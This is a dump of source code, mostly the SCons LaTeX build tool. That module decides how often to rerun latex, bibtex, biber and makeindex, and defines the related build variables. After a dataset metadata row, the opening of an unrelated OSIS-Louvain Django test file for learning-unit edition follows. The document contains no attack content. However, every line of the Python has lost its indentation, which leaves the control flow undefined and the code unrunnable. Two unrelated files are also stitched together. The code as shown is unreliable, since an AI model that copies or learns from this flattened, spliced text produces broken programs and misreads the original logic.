# An action to build a latex file. This action might be needed more
# than once if we are dealing with labels and bibtex.
LaTeXAction = None
# An action to run BibTeX on a file.
BibTeXAction = None
# An action to run Biber on a file.
BiberAction = None
# An action to run MakeIndex on a file.
MakeIndexAction = None
# An action to run MakeIndex (for nomencl) on a file.
MakeNclAction = None
# An action to run MakeIndex (for glossary) on a file.
MakeGlossaryAction = None
# An action to run MakeIndex (for acronyms) on a file.
MakeAcronymsAction = None
# An action to run MakeIndex (for newglossary commands) on a file.
MakeNewGlossaryAction = None
# Used as a return value of modify_env_var if the variable is not set.
_null = SCons.Scanner.LaTeX._null
modify_env_var = SCons.Scanner.LaTeX.modify_env_var
def check_file_error_message(utility, filename='log'):
msg = '%s returned an error, check the %s file\n' % (utility, filename)
sys.stdout.write(msg)
def FindFile(name,suffixes,paths,env,requireExt=False):
if requireExt:
name,ext = SCons.Util.splitext(name)
# if the user gave an extension use it.
if ext:
name = name + ext
if Verbose:
print " searching for '%s' with extensions: " % name,suffixes
for path in paths:
testName = os.path.join(path,name)
if Verbose:
print " look for '%s'" % testName
if os.path.isfile(testName):
if Verbose:
print " found '%s'" % testName
return env.fs.File(testName)
else:
name_ext = SCons.Util.splitext(testName)[1]
if name_ext:
continue
# if no suffix try adding those passed in
for suffix in suffixes:
testNameExt = testName + suffix
if Verbose:
print " look for '%s'" % testNameExt
if os.path.isfile(testNameExt):
if Verbose:
print " found '%s'" % testNameExt
return env.fs.File(testNameExt)
if Verbose:
print " did not find '%s'" % name
return None
def InternalLaTeXAuxAction(XXXLaTeXAction, target = None, source= None, env=None):
"""A builder for LaTeX files that checks the output in the aux file
and decides how many times to use LaTeXAction, and BibTeXAction."""
global must_rerun_latex
# This routine is called with two actions. In this file for DVI builds
# with LaTeXAction and from the pdflatex.py with PDFLaTeXAction
# set this up now for the case where the user requests a different extension
# for the target filename
if (XXXLaTeXAction == LaTeXAction):
callerSuffix = ".dvi"
else:
callerSuffix = env['PDFSUFFIX']
basename = SCons.Util.splitext(str(source[0]))[0]
basedir = os.path.split(str(source[0]))[0]
basefile = os.path.split(str(basename))[1]
abspath = os.path.abspath(basedir)
targetext = os.path.splitext(str(target[0]))[1]
targetdir = os.path.split(str(target[0]))[0]
saved_env = {}
for var in SCons.Scanner.LaTeX.LaTeX.env_variables:
saved_env[var] = modify_env_var(env, var, abspath)
# Create base file names with the target directory since the auxiliary files
# will be made there. That's because the *COM variables have the cd
# command in the prolog. We check
# for the existence of files before opening them--even ones like the
# aux file that TeX always creates--to make it possible to write tests
# with stubs that don't necessarily generate all of the same files.
targetbase = os.path.join(targetdir, basefile)
# if there is a \makeindex there will be a .idx and thus
# we have to run makeindex at least once to keep the build
# happy even if there is no index.
# Same for glossaries, nomenclature, and acronyms
src_content = source[0].get_text_contents()
run_makeindex = makeindex_re.search(src_content) and not os.path.isfile(targetbase + '.idx')
run_nomenclature = makenomenclature_re.search(src_content) and not os.path.isfile(targetbase + '.nlo')
run_glossary = makeglossary_re.search(src_content) and not os.path.isfile(targetbase + '.glo')
run_glossaries = makeglossaries_re.search(src_content) and not os.path.isfile(targetbase + '.glo')
run_acronyms = makeacronyms_re.search(src_content) and not os.path.isfile(targetbase + '.acn')
saved_hashes = {}
suffix_nodes = {}
for suffix in all_suffixes+sum(newglossary_suffix, []):
theNode = env.fs.File(targetbase + suffix)
suffix_nodes[suffix] = theNode
saved_hashes[suffix] = theNode.get_csig()
if Verbose:
print "hashes: ",saved_hashes
must_rerun_latex = True
# .aux files already processed by BibTex
already_bibtexed = []
#
# routine to update MD5 hash and compare
#
def check_MD5(filenode, suffix):
global must_rerun_latex
# two calls to clear old csig
filenode.clear_memoized_values()
filenode.ninfo = filenode.new_ninfo()
new_md5 = filenode.get_csig()
if saved_hashes[suffix] == new_md5:
if Verbose:
print "file %s not changed" % (targetbase+suffix)
return False # unchanged
saved_hashes[suffix] = new_md5
must_rerun_latex = True
if Verbose:
print "file %s changed, rerunning Latex, new hash = " % (targetbase+suffix), new_md5
return True # changed
# generate the file name that latex will generate
resultfilename = targetbase + callerSuffix
count = 0
while (must_rerun_latex and count < int(env.subst('$LATEXRETRIES'))) :
result = XXXLaTeXAction(target, source, env)
if result != 0:
return result
count = count + 1
must_rerun_latex = False
# Decide if various things need to be run, or run again.
# Read the log file to find warnings/errors
logfilename = targetbase + '.log'
logContent = ''
if os.path.isfile(logfilename):
logContent = open(logfilename, "rb").read()
# Read the fls file to find all .aux files
flsfilename = targetbase + '.fls'
flsContent = ''
auxfiles = []
if os.path.isfile(flsfilename):
flsContent = open(flsfilename, "rb").read()
auxfiles = openout_aux_re.findall(flsContent)
# remove duplicates
dups = {}
for x in auxfiles:
dups[x] = 1
auxfiles = list(dups.keys())
bcffiles = []
if os.path.isfile(flsfilename):
flsContent = open(flsfilename, "rb").read()
bcffiles = openout_bcf_re.findall(flsContent)
# remove duplicates
dups = {}
for x in bcffiles:
dups[x] = 1
bcffiles = list(dups.keys())
if Verbose:
print "auxfiles ",auxfiles
print "bcffiles ",bcffiles
# Now decide if bibtex will need to be run.
# The information that bibtex reads from the .aux file is
# pass-independent. If we find (below) that the .bbl file is unchanged,
# then the last latex saw a correct bibliography.
# Therefore only do this once
# Go through all .aux files and remember the files already done.
for auxfilename in auxfiles:
if auxfilename not in already_bibtexed:
already_bibtexed.append(auxfilename)
target_aux = os.path.join(targetdir, auxfilename)
if os.path.isfile(target_aux):
content = open(target_aux, "rb").read()
if content.find("bibdata") != -1:
if Verbose:
print "Need to run bibtex on ",auxfilename
bibfile = env.fs.File(SCons.Util.splitext(target_aux)[0])
result = BibTeXAction(bibfile, bibfile, env)
if result != 0:
check_file_error_message(env['BIBTEX'], 'blg')
must_rerun_latex = True
# Now decide if biber will need to be run.
# When the backend for biblatex is biber (by choice or default) the
# citation information is put in the .bcf file.
# The information that biber reads from the .bcf file is
# pass-independent. If we find (below) that the .bbl file is unchanged,
# then the last latex saw a correct bibliography.
# Therefore only do this once
# Go through all .bcf files and remember the files already done.
for bcffilename in bcffiles:
if bcffilename not in already_bibtexed:
already_bibtexed.append(bcffilename)
target_bcf = os.path.join(targetdir, bcffilename)
if os.path.isfile(target_bcf):
content = open(target_bcf, "rb").read()
if content.find("bibdata") != -1:
if Verbose:
print "Need to run biber on ",bcffilename
bibfile = env.fs.File(SCons.Util.splitext(target_bcf)[0])
result = BiberAction(bibfile, bibfile, env)
if result != 0:
check_file_error_message(env['BIBER'], 'blg')
must_rerun_latex = True
# Now decide if latex will need to be run again due to index.
if check_MD5(suffix_nodes['.idx'],'.idx') or (count == 1 and run_makeindex):
# We must run makeindex
if Verbose:
print "Need to run makeindex"
idxfile = suffix_nodes['.idx']
result = MakeIndexAction(idxfile, idxfile, env)
if result != 0:
check_file_error_message(env['MAKEINDEX'], 'ilg')
return result
# TO-DO: need to add a way for the user to extend this list for whatever
# auxiliary files they create in other (or their own) packages
        # Harder case is where an action needs to be called -- that should be rare (I hope?)
for index in check_suffixes:
check_MD5(suffix_nodes[index],index)
# Now decide if latex will need to be run again due to nomenclature.
if check_MD5(suffix_nodes['.nlo'],'.nlo') or (count == 1 and run_nomenclature):
# We must run makeindex
if Verbose:
print "Need to run makeindex for nomenclature"
nclfile = suffix_nodes['.nlo']
result = MakeNclAction(nclfile, nclfile, env)
if result != 0:
check_file_error_message('%s (nomenclature)' % env['MAKENCL'],
'nlg')
#return result
# Now decide if latex will need to be run again due to glossary.
if check_MD5(suffix_nodes['.glo'],'.glo') or (count == 1 and run_glossaries) or (count == 1 and run_glossary):
# We must run makeindex
if Verbose:
print "Need to run makeindex for glossary"
glofile = suffix_nodes['.glo']
result = MakeGlossaryAction(glofile, glofile, env)
if result != 0:
check_file_error_message('%s (glossary)' % env['MAKEGLOSSARY'],
'glg')
#return result
# Now decide if latex will need to be run again due to acronyms.
if check_MD5(suffix_nodes['.acn'],'.acn') or (count == 1 and run_acronyms):
# We must run makeindex
if Verbose:
print "Need to run makeindex for acronyms"
acrfile = suffix_nodes['.acn']
result = MakeAcronymsAction(acrfile, acrfile, env)
if result != 0:
check_file_error_message('%s (acronyms)' % env['MAKEACRONYMS'],
'alg')
return result
# Now decide if latex will need to be run again due to newglossary command.
for ig in range(len(newglossary_suffix)):
if check_MD5(suffix_nodes[newglossary_suffix[ig][2]],newglossary_suffix[ig][2]) or (count == 1):
# We must run makeindex
if Verbose:
print "Need to run makeindex for newglossary"
newglfile = suffix_nodes[newglossary_suffix[ig][2]]
MakeNewGlossaryAction = SCons.Action.Action("$MAKENEWGLOSSARY ${SOURCE.filebase}%s -s ${SOURCE.filebase}.ist -t ${SOURCE.filebase}%s -o ${SOURCE.filebase}%s" % (newglossary_suffix[ig][2],newglossary_suffix[ig][0],newglossary_suffix[ig][1]), "$MAKENEWGLOSSARYCOMSTR")
result = MakeNewGlossaryAction(newglfile, newglfile, env)
if result != 0:
check_file_error_message('%s (newglossary)' % env['MAKENEWGLOSSARY'],
newglossary_suffix[ig][0])
return result
# Now decide if latex needs to be run yet again to resolve warnings.
if warning_rerun_re.search(logContent):
must_rerun_latex = True
if Verbose:
print "rerun Latex due to latex or package rerun warning"
if rerun_citations_re.search(logContent):
must_rerun_latex = True
if Verbose:
print "rerun Latex due to 'Rerun to get citations correct' warning"
if undefined_references_re.search(logContent):
must_rerun_latex = True
if Verbose:
print "rerun Latex due to undefined references or citations"
if (count >= int(env.subst('$LATEXRETRIES')) and must_rerun_latex):
print "reached max number of retries on Latex ,",int(env.subst('$LATEXRETRIES'))
# end of while loop
# rename Latex's output to what the target name is
if not (str(target[0]) == resultfilename and os.path.isfile(resultfilename)):
if os.path.isfile(resultfilename):
print "move %s to %s" % (resultfilename, str(target[0]), )
shutil.move(resultfilename,str(target[0]))
# Original comment (when TEXPICTS was not restored):
    # The TEXPICTS environment variable is needed by a dvi -> pdf step
# later on Mac OSX so leave it
#
# It is also used when searching for pictures (implicit dependencies).
# Why not set the variable again in the respective builder instead
# of leaving local modifications in the environment? What if multiple
# latex builds in different directories need different TEXPICTS?
for var in SCons.Scanner.LaTeX.LaTeX.env_variables:
if var == 'TEXPICTS':
continue
if saved_env[var] is _null:
try:
del env['ENV'][var]
except KeyError:
pass # was never set
else:
env['ENV'][var] = saved_env[var]
return result
def LaTeXAuxAction(target = None, source= None, env=None):
result = InternalLaTeXAuxAction( LaTeXAction, target, source, env )
return result
LaTeX_re = re.compile("\\\\document(style|class)")
def is_LaTeX(flist,env,abspath):
"""Scan a file list to decide if it's TeX- or LaTeX-flavored."""
# We need to scan files that are included in case the
# \documentclass command is in them.
# get path list from both env['TEXINPUTS'] and env['ENV']['TEXINPUTS']
savedpath = modify_env_var(env, 'TEXINPUTS', abspath)
paths = env['ENV']['TEXINPUTS']
if SCons.Util.is_List(paths):
pass
else:
# Split at os.pathsep to convert into absolute path
paths = paths.split(os.pathsep)
# now that we have the path list restore the env
if savedpath is _null:
try:
del env['ENV']['TEXINPUTS']
except KeyError:
pass # was never set
else:
env['ENV']['TEXINPUTS'] = savedpath
if Verbose:
print "is_LaTeX search path ",paths
print "files to search :",flist
# Now that we have the search path and file list, check each one
for f in flist:
if Verbose:
print " checking for Latex source ",str(f)
content = f.get_text_contents()
if LaTeX_re.search(content):
if Verbose:
print "file %s is a LaTeX file" % str(f)
return 1
if Verbose:
print "file %s is not a LaTeX file" % str(f)
# now find included files
inc_files = [ ]
inc_files.extend( include_re.findall(content) )
if Verbose:
print "files included by '%s': "%str(f),inc_files
# inc_files is list of file names as given. need to find them
# using TEXINPUTS paths.
# search the included files
for src in inc_files:
srcNode = FindFile(src,['.tex','.ltx','.latex'],paths,env,requireExt=False)
# make this a list since is_LaTeX takes a list.
fileList = [srcNode,]
if Verbose:
print "FindFile found ",srcNode
if srcNode is not None:
file_test = is_LaTeX(fileList, env, abspath)
# return on first file that finds latex is needed.
if file_test:
return file_test
if Verbose:
print " done scanning ",str(f)
return 0
def TeXLaTeXFunction(target = None, source= None, env=None):
"""A builder for TeX and LaTeX that scans the source file to
decide the "flavor" of the source and then executes the appropriate
program."""
# find these paths for use in is_LaTeX to search for included files
basedir = os.path.split(str(source[0]))[0]
abspath = os.path.abspath(basedir)
if is_LaTeX(source,env,abspath):
result = LaTeXAuxAction(target,source,env)
if result != 0:
check_file_error_message(env['LATEX'])
else:
result = TeXAction(target,source,env)
if result != 0:
check_file_error_message(env['TEX'])
return result
def TeXLaTeXStrFunction(target = None, source= None, env=None):
"""A strfunction for TeX and LaTeX that scans the source file to
decide the "flavor" of the source and then returns the appropriate
command string."""
if env.GetOption("no_exec"):
# find these paths for use in is_LaTeX to search for included files
basedir = os.path.split(str(source[0]))[0]
abspath = os.path.abspath(basedir)
if is_LaTeX(source,env,abspath):
result = env.subst('$LATEXCOM',0,target,source)+" ..."
else:
result = env.subst("$TEXCOM",0,target,source)+" ..."
else:
result = ''
return result
def tex_eps_emitter(target, source, env):
"""An emitter for TeX and LaTeX sources when
executing tex or latex. It will accept .ps and .eps
graphics files
"""
(target, source) = tex_emitter_core(target, source, env, TexGraphics)
return (target, source)
def tex_pdf_emitter(target, source, env):
"""An emitter for TeX and LaTeX sources when
executing pdftex or pdflatex. It will accept graphics
files of types .pdf, .jpg, .png, .gif, and .tif
"""
(target, source) = tex_emitter_core(target, source, env, LatexGraphics)
return (target, source)
def ScanFiles(theFile, target, paths, file_tests, file_tests_search, env, graphics_extensions, targetdir, aux_files):
""" For theFile (a Node) update any file_tests and search for graphics files
then find all included files and call ScanFiles recursively for each of them"""
content = theFile.get_text_contents()
if Verbose:
print " scanning ",str(theFile)
for i in range(len(file_tests_search)):
if file_tests[i][0] is None:
if Verbose:
print "scan i ",i," files_tests[i] ",file_tests[i], file_tests[i][1]
file_tests[i][0] = file_tests_search[i].search(content)
if Verbose and file_tests[i][0]:
print " found match for ",file_tests[i][1][-1]
# for newglossary insert the suffixes in file_tests[i]
if file_tests[i][0] and file_tests[i][1][-1] == 'newglossary':
findresult = file_tests_search[i].findall(content)
for l in range(len(findresult)) :
(file_tests[i][1]).insert(0,'.'+findresult[l][3])
(file_tests[i][1]).insert(0,'.'+findresult[l][2])
(file_tests[i][1]).insert(0,'.'+findresult[l][0])
suffix_list = ['.'+findresult[l][0],'.'+findresult[l][2],'.'+findresult[l][3] ]
newglossary_suffix.append(suffix_list)
if Verbose:
print " new suffixes for newglossary ",newglossary_suffix
incResult = includeOnly_re.search(content)
if incResult:
aux_files.append(os.path.join(targetdir, incResult.group(1)))
if Verbose:
print "\include file names : ", aux_files
# recursively call this on each of the included files
inc_files = [ ]
inc_files.extend( include_re.findall(content) )
if Verbose:
print "files included by '%s': "%str(theFile),inc_files
# inc_files is list of file names as given. need to find them
# using TEXINPUTS paths.
for src in inc_files:
srcNode = FindFile(src,['.tex','.ltx','.latex'],paths,env,requireExt=False)
if srcNode is not None:
file_tests = ScanFiles(srcNode, target, paths, file_tests, file_tests_search, env, graphics_extensions, targetdir, aux_files)
if Verbose:
print " done scanning ",str(theFile)
return file_tests
def tex_emitter_core(target, source, env, graphics_extensions):
"""An emitter for TeX and LaTeX sources.
For LaTeX sources we try and find the common created files that
are needed on subsequent runs of latex to finish tables of contents,
bibliographies, indices, lists of figures, and hyperlink references.
"""
basename = SCons.Util.splitext(str(source[0]))[0]
basefile = os.path.split(str(basename))[1]
targetdir = os.path.split(str(target[0]))[0]
targetbase = os.path.join(targetdir, basefile)
basedir = os.path.split(str(source[0]))[0]
abspath = os.path.abspath(basedir)
target[0].attributes.path = abspath
#
# file names we will make use of in searching the sources and log file
#
emit_suffixes = ['.aux', '.log', '.ilg', '.blg', '.nls', '.nlg', '.gls', '.glg', '.alg'] + all_suffixes
auxfilename = targetbase + '.aux'
logfilename = targetbase + '.log'
flsfilename = targetbase + '.fls'
syncfilename = targetbase + '.synctex.gz'
env.SideEffect(auxfilename,target[0])
env.SideEffect(logfilename,target[0])
env.SideEffect(flsfilename,target[0])
env.SideEffect(syncfilename,target[0])
if Verbose:
print "side effect :",auxfilename,logfilename,flsfilename,syncfilename
env.Clean(target[0],auxfilename)
env.Clean(target[0],logfilename)
env.Clean(target[0],flsfilename)
env.Clean(target[0],syncfilename)
content = source[0].get_text_contents()
# These variables are no longer used.
#idx_exists = os.path.isfile(targetbase + '.idx')
#nlo_exists = os.path.isfile(targetbase + '.nlo')
#glo_exists = os.path.isfile(targetbase + '.glo')
#acr_exists = os.path.isfile(targetbase + '.acn')
# set up list with the regular expressions
# we use to find features used
file_tests_search = [auxfile_re,
makeindex_re,
bibliography_re,
bibunit_re,
multibib_re,
addbibresource_re,
tableofcontents_re,
listoffigures_re,
listoftables_re,
hyperref_re,
makenomenclature_re,
makeglossary_re,
makeglossaries_re,
makeacronyms_re,
beamer_re,
newglossary_re,
biblatex_re ]
# set up list with the file suffixes that need emitting
# when a feature is found
file_tests_suff = [['.aux','aux_file'],
['.idx', '.ind', '.ilg','makeindex'],
['.bbl', '.blg','bibliography'],
['.bbl', '.blg','bibunit'],
['.bbl', '.blg','multibib'],
['.bbl', '.blg','.bcf','addbibresource'],
['.toc','contents'],
['.lof','figures'],
['.lot','tables'],
['.out','hyperref'],
['.nlo', '.nls', '.nlg','nomenclature'],
['.glo', '.gls', '.glg','glossary'],
['.glo', '.gls', '.glg','glossaries'],
['.acn', '.acr', '.alg','acronyms'],
['.nav', '.snm', '.out', '.toc','beamer'],
['newglossary',],
['.bcf', '.blg','biblatex'] ]
# for newglossary the suffixes are added as we find the command
# build the list of lists
file_tests = []
for i in range(len(file_tests_search)):
file_tests.append( [None, file_tests_suff[i]] )
# TO-DO: need to add a way for the user to extend this list for whatever
# auxiliary files they create in other (or their own) packages
# get path list from both env['TEXINPUTS'] and env['ENV']['TEXINPUTS']
savedpath = modify_env_var(env, 'TEXINPUTS', abspath)
paths = env['ENV']['TEXINPUTS']
if SCons.Util.is_List(paths):
pass
else:
# Split at os.pathsep to convert into absolute path
paths = paths.split(os.pathsep)
# now that we have the path list restore the env
if savedpath is _null:
try:
del env['ENV']['TEXINPUTS']
except KeyError:
pass # was never set
else:
env['ENV']['TEXINPUTS'] = savedpath
if Verbose:
print "search path ",paths
# scan all sources for side effect files
aux_files = []
file_tests = ScanFiles(source[0], target, paths, file_tests, file_tests_search, env, graphics_extensions, targetdir, aux_files)
for (theSearch,suffix_list) in file_tests:
        # add side effects if feature is present. If file is to be generated, add all side effects
if Verbose and theSearch:
print "check side effects for ",suffix_list[-1]
if (theSearch != None) or (not source[0].exists() ):
file_list = [targetbase,]
# for bibunit we need a list of files
if suffix_list[-1] == 'bibunit':
file_basename = os.path.join(targetdir, 'bu*.aux')
file_list = glob.glob(file_basename)
# remove the suffix '.aux'
for i in range(len(file_list)):
file_list.append(SCons.Util.splitext(file_list[i])[0])
# for multibib we need a list of files
if suffix_list[-1] == 'multibib':
for multibibmatch in multibib_re.finditer(content):
if Verbose:
print "multibib match ",multibibmatch.group(1)
if multibibmatch != None:
baselist = multibibmatch.group(1).split(',')
if Verbose:
print "multibib list ", baselist
for i in range(len(baselist)):
file_list.append(os.path.join(targetdir, baselist[i]))
# now define the side effects
for file_name in file_list:
for suffix in suffix_list[:-1]:
env.SideEffect(file_name + suffix,target[0])
if Verbose:
print "side effect tst :",file_name + suffix, " target is ",str(target[0])
env.Clean(target[0],file_name + suffix)
for aFile in aux_files:
aFile_base = SCons.Util.splitext(aFile)[0]
env.SideEffect(aFile_base + '.aux',target[0])
if Verbose:
print "side effect aux :",aFile_base + '.aux'
env.Clean(target[0],aFile_base + '.aux')
# read fls file to get all other files that latex creates and will read on the next pass
# remove files from list that we explicitly dealt with above
if os.path.isfile(flsfilename):
content = open(flsfilename, "rb").read()
out_files = openout_re.findall(content)
myfiles = [auxfilename, logfilename, flsfilename, targetbase+'.dvi',targetbase+'.pdf']
for filename in out_files[:]:
if filename in myfiles:
out_files.remove(filename)
env.SideEffect(out_files,target[0])
if Verbose:
print "side effect fls :",out_files
env.Clean(target[0],out_files)
return (target, source)
TeXLaTeXAction = None
def generate(env):
"""Add Builders and construction variables for TeX to an Environment."""
global TeXLaTeXAction
if TeXLaTeXAction is None:
TeXLaTeXAction = SCons.Action.Action(TeXLaTeXFunction,
strfunction=TeXLaTeXStrFunction)
env.AppendUnique(LATEXSUFFIXES=SCons.Tool.LaTeXSuffixes)
generate_common(env)
import dvi
dvi.generate(env)
bld = env['BUILDERS']['DVI']
bld.add_action('.tex', TeXLaTeXAction)
bld.add_emitter('.tex', tex_eps_emitter)
def generate_darwin(env):
try:
environ = env['ENV']
except KeyError:
environ = {}
env['ENV'] = environ
if (platform.system() == 'Darwin'):
try:
ospath = env['ENV']['PATHOSX']
except:
ospath = None
if ospath:
env.AppendENVPath('PATH', ospath)
def generate_common(env):
"""Add internal Builders and construction variables for LaTeX to an Environment."""
# Add OSX system paths so TeX tools can be found
# when a list of tools is given the exists() method is not called
generate_darwin(env)
# A generic tex file Action, sufficient for all tex files.
global TeXAction
if TeXAction is None:
TeXAction = SCons.Action.Action("$TEXCOM", "$TEXCOMSTR")
# An Action to build a latex file. This might be needed more
# than once if we are dealing with labels and bibtex.
global LaTeXAction
if LaTeXAction is None:
LaTeXAction = SCons.Action.Action("$LATEXCOM", "$LATEXCOMSTR")
# Define an action to run BibTeX on a file.
global BibTeXAction
if BibTeXAction is None:
BibTeXAction = SCons.Action.Action("$BIBTEXCOM", "$BIBTEXCOMSTR")
# Define an action to run Biber on a file.
global BiberAction
if BiberAction is None:
BiberAction = SCons.Action.Action("$BIBERCOM", "$BIBERCOMSTR")
# Define an action to run MakeIndex on a file.
global MakeIndexAction
if MakeIndexAction is None:
MakeIndexAction = SCons.Action.Action("$MAKEINDEXCOM", "$MAKEINDEXCOMSTR")
# Define an action to run MakeIndex on a file for nomenclatures.
global MakeNclAction
if MakeNclAction is None:
MakeNclAction = SCons.Action.Action("$MAKENCLCOM", "$MAKENCLCOMSTR")
# Define an action to run MakeIndex on a file for glossaries.
global MakeGlossaryAction
if MakeGlossaryAction is None:
MakeGlossaryAction = SCons.Action.Action("$MAKEGLOSSARYCOM", "$MAKEGLOSSARYCOMSTR")
# Define an action to run MakeIndex on a file for acronyms.
global MakeAcronymsAction
if MakeAcronymsAction is None:
MakeAcronymsAction = SCons.Action.Action("$MAKEACRONYMSCOM", "$MAKEACRONYMSCOMSTR")
try:
environ = env['ENV']
except KeyError:
environ = {}
env['ENV'] = environ
# Some Linux platforms have pdflatex set up in a way
# that requires that the HOME environment variable be set.
# Add it here if defined.
v = os.environ.get('HOME')
if v:
environ['HOME'] = v
CDCOM = 'cd '
if platform.system() == 'Windows':
# allow cd command to change drives on Windows
CDCOM = 'cd /D '
env['TEX'] = 'tex'
env['TEXFLAGS'] = SCons.Util.CLVar('-interaction=nonstopmode -recorder')
env['TEXCOM'] = CDCOM + '${TARGET.dir} && $TEX $TEXFLAGS ${SOURCE.file}'
env['PDFTEX'] = 'pdftex'
env['PDFTEXFLAGS'] = SCons.Util.CLVar('-interaction=nonstopmode -recorder')
env['PDFTEXCOM'] = CDCOM + '${TARGET.dir} && $PDFTEX $PDFTEXFLAGS ${SOURCE.file}'
env['LATEX'] = 'latex'
env['LATEXFLAGS'] = SCons.Util.CLVar('-interaction=nonstopmode -recorder')
env['LATEXCOM'] = CDCOM + '${TARGET.dir} && $LATEX $LATEXFLAGS ${SOURCE.file}'
env['LATEXRETRIES'] = 4
env['PDFLATEX'] = 'pdflatex'
env['PDFLATEXFLAGS'] = SCons.Util.CLVar('-interaction=nonstopmode -recorder')
env['PDFLATEXCOM'] = CDCOM + '${TARGET.dir} && $PDFLATEX $PDFLATEXFLAGS ${SOURCE.file}'
env['BIBTEX'] = 'bibtex'
env['BIBTEXFLAGS'] = SCons.Util.CLVar('')
env['BIBTEXCOM'] = CDCOM + '${TARGET.dir} && $BIBTEX $BIBTEXFLAGS ${SOURCE.filebase}'
env['BIBER'] = 'biber'
env['BIBERFLAGS'] = SCons.Util.CLVar('')
env['BIBERCOM'] = CDCOM + '${TARGET.dir} && $BIBER $BIBERFLAGS ${SOURCE.filebase}'
env['MAKEINDEX'] = 'makeindex'
env['MAKEINDEXFLAGS'] = SCons.Util.CLVar('')
env['MAKEINDEXCOM'] = CDCOM + '${TARGET.dir} && $MAKEINDEX $MAKEINDEXFLAGS ${SOURCE.file}'
env['MAKEGLOSSARY'] = 'makeindex'
env['MAKEGLOSSARYSTYLE'] = '${SOURCE.filebase}.ist'
env['MAKEGLOSSARYFLAGS'] = SCons.Util.CLVar('-s ${MAKEGLOSSARYSTYLE} -t ${SOURCE.filebase}.glg')
env['MAKEGLOSSARYCOM'] = CDCOM + '${TARGET.dir} && $MAKEGLOSSARY ${SOURCE.filebase}.glo $MAKEGLOSSARYFLAGS -o ${SOURCE.filebase}.gls'
env['MAKEACRONYMS'] = 'makeindex'
env['MAKEACRONYMSSTYLE'] = '${SOURCE.filebase}.ist'
env['MAKEACRONYMSFLAGS'] = SCons.Util.CLVar('-s ${MAKEACRONYMSSTYLE} -t ${SOURCE.filebase}.alg')
env['MAKEACRONYMSCOM'] = CDCOM + '${TARGET.dir} && $MAKEACRONYMS ${SOURCE.filebase}.acn $MAKEACRONYMSFLAGS -o ${SOURCE.filebase}.acr'
env['MAKENCL'] = 'makeindex'
env['MAKENCLSTYLE'] = 'nomencl.ist'
env['MAKENCLFLAGS'] = '-s ${MAKENCLSTYLE} -t ${SOURCE.filebase}.nlg'
env['MAKENCLCOM'] = CDCOM + '${TARGET.dir} && $MAKENCL ${SOURCE.filebase}.nlo $MAKENCLFLAGS -o ${SOURCE.filebase}.nls'
env['MAKENEWGLOSSARY'] = 'makeindex'
env['MAKENEWGLOSSARYCOM'] = CDCOM + '${TARGET.dir} && $MAKENEWGLOSSARY '
def exists(env):
generate_darwin(env)
return env.Detect('tex')
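# Example SConstruct usage (an illustrative sketch, not part of this module):
# the builders and construction variables configured above are normally driven
# from a project's SConstruct, along the lines of
#
#     env = Environment(tools=['tex', 'latex', 'dvipdf'])
#     env.DVI('thesis.dvi', 'thesis.tex')
#
# where 'thesis.tex' is a placeholder file name. LATEXRETRIES (default 4 above)
# bounds how many times InternalLaTeXAuxAction re-runs latex to resolve
# references, indices and bibliographies.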
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| mit | -993,091,141,330,779,500 | 39.50504 | 282 | 0.608546 | false |
uclouvain/OSIS-Louvain | base/tests/business/test_learning_unit_edition.py | 1 | 63175 | ##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2019 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from datetime import datetime
from decimal import Decimal
from django.db import IntegrityError
from django.forms import model_to_dict
from django.test import TestCase
from django.utils.translation import gettext_lazy as _
from base.business.learning_units.edition import edit_learning_unit_end_date, update_learning_unit_year_with_report, \
_report_volume
from base.forms.utils.choice_field import NO_PLANNED_END_DISPLAY
from base.models import academic_year
from base.models import learning_unit_year as mdl_luy
from base.models import teaching_material as mdl_teaching_material
from base.models.academic_year import compute_max_academic_year_adjournment
from base.models.enums import learning_component_year_type
from base.models.enums import learning_unit_year_subtypes, learning_unit_year_periodicity, \
learning_container_year_types, attribution_procedure, internship_subtypes, learning_unit_year_session, \
quadrimesters, vacant_declaration_type, entity_container_year_link_type
from base.models.enums.entity_container_year_link_type import REQUIREMENT_ENTITY, ALLOCATION_ENTITY, \
ADDITIONAL_REQUIREMENT_ENTITY_1, ADDITIONAL_REQUIREMENT_ENTITY_2
from base.models.learning_component_year import LearningComponentYear
from base.models.learning_container_year import LearningContainerYear
from base.models.learning_unit_year import LearningUnitYear
from base.tests.factories.academic_year import AcademicYearFactory
from base.tests.factories.business.learning_units import LearningUnitsMixin, GenerateContainer
from base.tests.factories.campus import CampusFactory
from base.tests.factories.entity import EntityFactory
from base.tests.factories.entity_version import EntityVersionFactory
from base.tests.factories.external_learning_unit_year import ExternalLearningUnitYearFactory
from base.tests.factories.learning_component_year import LearningComponentYearFactory, \
LecturingLearningComponentYearFactory, PracticalLearningComponentYearFactory
from base.tests.factories.learning_container_year import LearningContainerYearFactory
from base.tests.factories.learning_unit import LearningUnitFactory
from base.tests.factories.learning_unit_year import LearningUnitYearFactory
from cms.models.translated_text import TranslatedText
from learning_unit.models.learning_class_year import LearningClassYear
from learning_unit.tests.factories.learning_class_year import LearningClassYearFactory
from reference.tests.factories.language import LanguageFactory
class TestLearningUnitEdition(TestCase, LearningUnitsMixin):
"""
General cases :
The start date of the learning unit is greater than current academic year
Only test the ANNUAL periodicity (the BIENNAL periodicity is covered later on)
The new end date of the learning unit is greater than old end date (creation)
01. test_edit_learning_unit_full_annual_end_date_gt_old_end_date_with_start_date_gt_now
02. test_edit_learning_unit_partim_annual_end_date_gt_old_end_date_with_start_date_gt_now
The start date of the learning unit is less than current academic year
The new end date of the learning unit is greater than old end date (creation)
03. test_edit_learning_unit_full_annual_end_date_gt_old_end_date_with_start_date_lt_now
04. test_edit_learning_unit_full_odd_end_date_gt_old_end_date_with_start_date_lt_now
05. test_edit_learning_unit_full_even_end_date_gt_old_end_date_with_start_date_lt_now
